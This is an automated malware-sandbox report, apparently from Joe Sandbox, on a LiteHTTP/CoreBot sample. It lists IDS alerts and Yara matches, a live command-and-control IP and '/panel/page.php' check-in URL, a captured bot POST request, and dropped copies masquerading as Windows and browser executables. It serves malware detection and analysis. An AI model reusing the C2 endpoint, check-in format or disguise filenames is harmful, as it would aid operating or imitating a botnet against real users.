                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49988 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49995 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49995 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49993 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49993 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49986 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49985 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49985 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49985 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49986 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49986 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49987 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49987 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49987 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49981 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49984 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49981 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49981 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49984 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49984 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49996 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49996 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49996 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49991 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49980 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49980 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49980 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49991 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49991 -> 185.208.159.109:80
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.8ba0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.8740000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.9060000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.8c00000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.82e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.87a0000.1.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknownHTTP traffic detected: POST /panel/page.php HTTP/1.1User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3Content-Type: application/x-www-form-urlencodedHost: 185.208.159.109Content-Length: 471Expect: 100-continueConnection: Keep-Alive
                    Source: DQmU06kq9I.exe, 00000000.00000002.4547997981.0000000005280000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000526E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.000000000507E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005037000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050B0000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.159.109
                    Source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp, DQmU06kq9I.exe, 00000009.00000002.4542857867.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000003.3530428715.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.159.109/panel/page.php
                    Source: DQmU06kq9I.exe, 00000009.00000002.4542857867.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000003.3530428715.00000000010F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.159.109/panel/page.php9
                    Source: DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000521C000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.0000000005280000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.000000000507E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005037000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050B0000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.159.109/panel/page.phpP
                    Source: DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000521C000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.2.DQmU06kq9I.exe.8ba0000.3.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 0.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 9.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 9.2.DQmU06kq9I.exe.8740000.2.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 0.2.DQmU06kq9I.exe.9060000.3.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 0.2.DQmU06kq9I.exe.8c00000.2.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 9.2.DQmU06kq9I.exe.82e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 8.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 0.2.DQmU06kq9I.exe.87a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    PE file contains section with special chars
                    Source: DQmU06kq9I.exeStatic PE information: section name:
                    Source: DQmU06kq9I.exeStatic PE information: section name: .idata
                    Source: DQmU06kq9I.exeStatic PE information: section name:
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name:
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name: .idata
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name:
                    Source: windows nt.exe.0.drStatic PE information: section name:
                    Source: windows nt.exe.0.drStatic PE information: section name: .idata
                    Source: windows nt.exe.0.drStatic PE information: section name:
                    Source: windows photo viewer.exe.0.drStatic PE information: section name:
                    Source: windows photo viewer.exe.0.drStatic PE information: section name: .idata
                    Source: windows photo viewer.exe.0.drStatic PE information: section name:
                    Source: windows portable devices.exe.0.drStatic PE information: section name:
                    Source: windows portable devices.exe.0.drStatic PE information: section name: .idata
                    Source: windows portable devices.exe.0.drStatic PE information: section name:
                    Source: windows sidebar.exe.0.drStatic PE information: section name:
                    Source: windows sidebar.exe.0.drStatic PE information: section name: .idata
                    Source: windows sidebar.exe.0.drStatic PE information: section name:
                    Source: autoit3.exe.0.drStatic PE information: section name:
                    Source: autoit3.exe.0.drStatic PE information: section name: .idata
                    Source: autoit3.exe.0.drStatic PE information: section name:
                    Source: windowspowershell.exe.0.drStatic PE information: section name:
                    Source: windowspowershell.exe.0.drStatic PE information: section name: .idata
                    Source: windowspowershell.exe.0.drStatic PE information: section name:
                    Source: common files.exe.0.drStatic PE information: section name:
                    Source: common files.exe.0.drStatic PE information: section name: .idata
                    Source: common files.exe.0.drStatic PE information: section name:
                    Source: google.exe.0.drStatic PE information: section name:
                    Source: google.exe.0.drStatic PE information: section name: .idata
                    Source: google.exe.0.drStatic PE information: section name:
                    Source: internet explorer.exe.0.drStatic PE information: section name:
                    Source: internet explorer.exe.0.drStatic PE information: section name: .idata
                    Source: internet explorer.exe.0.drStatic PE information: section name:
                    Source: java.exe.0.drStatic PE information: section name:
                    Source: java.exe.0.drStatic PE information: section name: .idata
                    Source: java.exe.0.drStatic PE information: section name:
                    Source: jdownloader.exe.0.drStatic PE information: section name:
                    Source: jdownloader.exe.0.drStatic PE information: section name: .idata
                    Source: jdownloader.exe.0.drStatic PE information: section name:
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name:
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name: .idata
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name:
                    Source: microsoft.exe.0.drStatic PE information: section name:
                    Source: microsoft.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft.exe.0.drStatic PE information: section name:
                    Source: microsoft office.exe.0.drStatic PE information: section name:
                    Source: microsoft office.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft office.exe.0.drStatic PE information: section name:
                    Source: microsoft.net.exe.0.drStatic PE information: section name:
                    Source: microsoft.net.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft.net.exe.0.drStatic PE information: section name:
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name:
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name: .idata
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name:
                    Source: msbuild.exe.0.drStatic PE information: section name:
                    Source: msbuild.exe.0.drStatic PE information: section name: .idata
                    Source: msbuild.exe.0.drStatic PE information: section name:
                    Source: msecache.exe.0.drStatic PE information: section name:
                    Source: msecache.exe.0.drStatic PE information: section name: .idata
                    Source: msecache.exe.0.drStatic PE information: section name:
                    Source: reference assemblies.exe.0.drStatic PE information: section name:
                    Source: reference assemblies.exe.0.drStatic PE information: section name: .idata
                    Source: reference assemblies.exe.0.drStatic PE information: section name:
                    Source: windows defender.exe.0.drStatic PE information: section name:
                    Source: windows defender.exe.0.drStatic PE information: section name: .idata
                    Source: windows defender.exe.0.drStatic PE information: section name:
                    Source: windows mail.exe.0.drStatic PE information: section name:
                    Source: windows mail.exe.0.drStatic PE information: section name: .idata
                    Source: windows mail.exe.0.drStatic PE information: section name:
                    Source: windows media player.exe.0.drStatic PE information: section name:
                    Source: windows media player.exe.0.drStatic PE information: section name: .idata
                    Source: windows media player.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_04F415500_2_04F41550
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_04F4316F0_2_04F4316F
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_04F4EC780_2_04F4EC78
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_04F415410_2_04F41541
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_04F41F680_2_04F41F68
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07C321530_2_07C32153
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07DC87E80_2_07DC87E8
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07DCD6180_2_07DCD618
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07DC75980_2_07DC7598
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07DCE9980_2_07DCE998
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07DC16A00_2_07DC16A0
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07DC1E780_2_07DC1E78
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07DC1E680_2_07DC1E68
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07DCDB680_2_07DCDB68
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 8_2_04E614908_2_04E61490
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 8_2_04E668288_2_04E66828
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 8_2_04E654A88_2_04E654A8
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 8_2_04E614808_2_04E61480
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 8_2_04E659F88_2_04E659F8
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_04D615509_2_04D61550
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_04D62FA89_2_04D62FA8
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_04D6EAB89_2_04D6EAB8
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_04D6153F9_2_04D6153F
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\OneDrive\autoit3.exe 375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\OneDrive\common files.exe 375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                    Source: DQmU06kq9I.exe, 00000000.00000002.4541111737.000000000055E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000000.00000002.4552402541.0000000008C02000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000000.00000000.2032501274.000000000055E000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000008.00000002.4541443989.000000000055E000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000009.00000002.4542857867.000000000101B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000009.00000000.2752384736.000000000055E000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000009.00000002.4541276467.000000000055E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exeBinary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9.2.DQmU06kq9I.exe.8ba0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 0.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 9.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 9.2.DQmU06kq9I.exe.8740000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 0.2.DQmU06kq9I.exe.9060000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 0.2.DQmU06kq9I.exe.8c00000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 9.2.DQmU06kq9I.exe.82e0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 8.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 0.2.DQmU06kq9I.exe.87a0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: DQmU06kq9I.exeStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: DQmU06kq9I.exeStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows multimedia platform.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows multimedia platform.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows nt.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows nt.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows photo viewer.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows photo viewer.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows portable devices.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows portable devices.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows sidebar.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows sidebar.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: autoit3.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: autoit3.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windowspowershell.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windowspowershell.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: common files.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: common files.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: google.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: google.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: internet explorer.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: internet explorer.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: java.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: java.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: jdownloader.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: jdownloader.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: microsoft.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: microsoft.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: microsoft office.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: microsoft office.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: microsoft.net.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: microsoft.net.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: mozilla maintenance service.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: mozilla maintenance service.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: msbuild.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: msbuild.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: msecache.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: msecache.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: reference assemblies.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: reference assemblies.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows defender.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows defender.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
